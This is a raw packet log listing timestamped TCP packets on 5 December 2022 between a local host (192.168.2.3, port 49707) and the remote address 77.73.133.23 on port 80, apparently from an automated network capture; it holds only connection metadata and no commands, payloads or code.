Dec 5, 2022 01:32:56.977482080 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.978059053 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.978094101 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.978111982 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.978121996 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.978151083 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.978152037 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.978173018 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.978180885 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.978202105 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.978209019 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.978223085 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.978236914 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.978264093 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.978279114 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.978291988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.978307009 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.978319883 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.978337049 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.978362083 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.979636908 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.979713917 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.979736090 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.979753017 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.979757071 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.979798079 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980154991 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980197906 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980212927 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980238914 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980247974 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980281115 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980292082 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980321884 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980330944 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980362892 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980366945 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980403900 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980408907 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980446100 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980447054 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980487108 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980489969 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980528116 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980530024 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980572939 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980631113 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980675936 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980684042 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980712891 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980729103 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980756044 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980861902 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980890989 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980907917 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980937958 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980941057 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980968952 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.980986118 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.980995893 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.981017113 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.981024027 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.981039047 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.981054068 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.981066942 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.981082916 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.981096983 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.981125116 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.981750011 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.981794119 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.981833935 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.981854916 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.981878996 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.981901884 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.981919050 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.981930017 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.981960058 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.981962919 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.982001066 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.982004881 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.982043028 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.982043982 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.982083082 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.982085943 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.982124090 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.982125998 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.982167006 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.982168913 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.982208014 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.982211113 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.982250929 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.982768059 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.982810974 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.982826948 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.982856989 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.982867002 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.982911110 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.982939005 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.982965946 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.982975960 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.982975960 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.982975960 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.982994080 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.983007908 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.983021975 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.983036041 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.983051062 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.983063936 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.983078957 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.983094931 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.983105898 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.983119965 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.983134985 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.983148098 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.983177900 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.983795881 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.983814955 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.983831882 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.983846903 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.983850956 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.983870029 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.983870983 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.983885050 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.983903885 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.983911991 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.984324932 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.984344006 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.984360933 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.984379053 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.984380960 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.984391928 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.984399080 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.984401941 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.984417915 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.984436989 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.984448910 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.984455109 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.984472990 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.984474897 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.984497070 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.984519005 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.984833956 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.984852076 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.984870911 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.984883070 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.984889030 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.984894991 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.984915972 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.984931946 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.986495972 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.986540079 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.986579895 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.986598015 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.986602068 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.986615896 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.986629009 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.986634016 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.986653090 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.986655951 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.986668110 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.986671925 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.986685991 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.986691952 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.986702919 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.986711979 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.986721039 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.986731052 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.986732960 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.986751080 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.986758947 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.986769915 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.986769915 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.986789942 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.986798048 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.986814976 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.986830950 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.986982107 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.987000942 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.987016916 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.987035036 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.987051964 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.987052917 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.987071037 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.987082958 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.987087965 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.987101078 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.987107038 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.987129927 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.987154007 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.987211943 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.987529039 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.989677906 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.989752054 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.989801884 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.989820004 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.989821911 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.989839077 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.989855051 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.989856958 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.989876032 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.989883900 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.989895105 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.989908934 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.989913940 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.989933014 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.989936113 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.989952087 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.989963055 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.989970922 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.989985943 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.989990950 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.990000010 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.990010023 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.990020037 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.990027905 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.990036964 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.990055084 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.990067959 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.991188049 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.991231918 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.991271019 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.991293907 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.991311073 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.991322041 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.991352081 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.991358995 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.991393089 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.991399050 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.991434097 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.991440058 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.991482019 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.991687059 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.991727114 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.991739035 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.991770983 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.992764950 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.992809057 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.992829084 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.992850065 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.992855072 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.992892027 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.992930889 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.992943048 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.992971897 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.993011951 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.993017912 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.993052959 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.993081093 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.993088007 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.993105888 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.993123055 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.993134975 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.993140936 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.993159056 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.993160009 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.993177891 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.993182898 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.993196011 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.993196011 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.993213892 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.993218899 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.993237019 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.993237972 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.993247986 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.993259907 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.993499041 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.995477915 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.995521069 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.995534897 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.995562077 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.995563030 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.995604038 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.995634079 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.995642900 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.995649099 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.995683908 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.995687008 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.995726109 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.995727062 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.995769024 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.995771885 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.995816946 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.995882988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.995966911 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.995982885 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.996001959 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.996018887 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.996026993 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.996037006 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.996046066 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.996056080 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.996064901 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.996074915 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.996083021 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.996093988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.996095896 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.996119022 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.996136904 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.996364117 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.996383905 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.996401072 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.996417999 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.996421099 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.996434927 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.996438026 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.996455908 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.996471882 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.996473074 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.996493101 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.996539116 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.996551991 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.998563051 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.998605013 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.998644114 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.998681068 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.998683929 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.998703003 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.998725891 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.998742104 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.998786926 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.998817921 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.998826981 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.998832941 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.998868942 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.998897076 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.998914003 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.998931885 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.998950005 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.998966932 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.998986006 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.999002934 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.999021053 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.999034882 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999034882 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999034882 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999034882 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999037981 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:56.999034882 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999034882 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:56.999062061 CET	80	49707	77.73.133.23	192.168.2.3
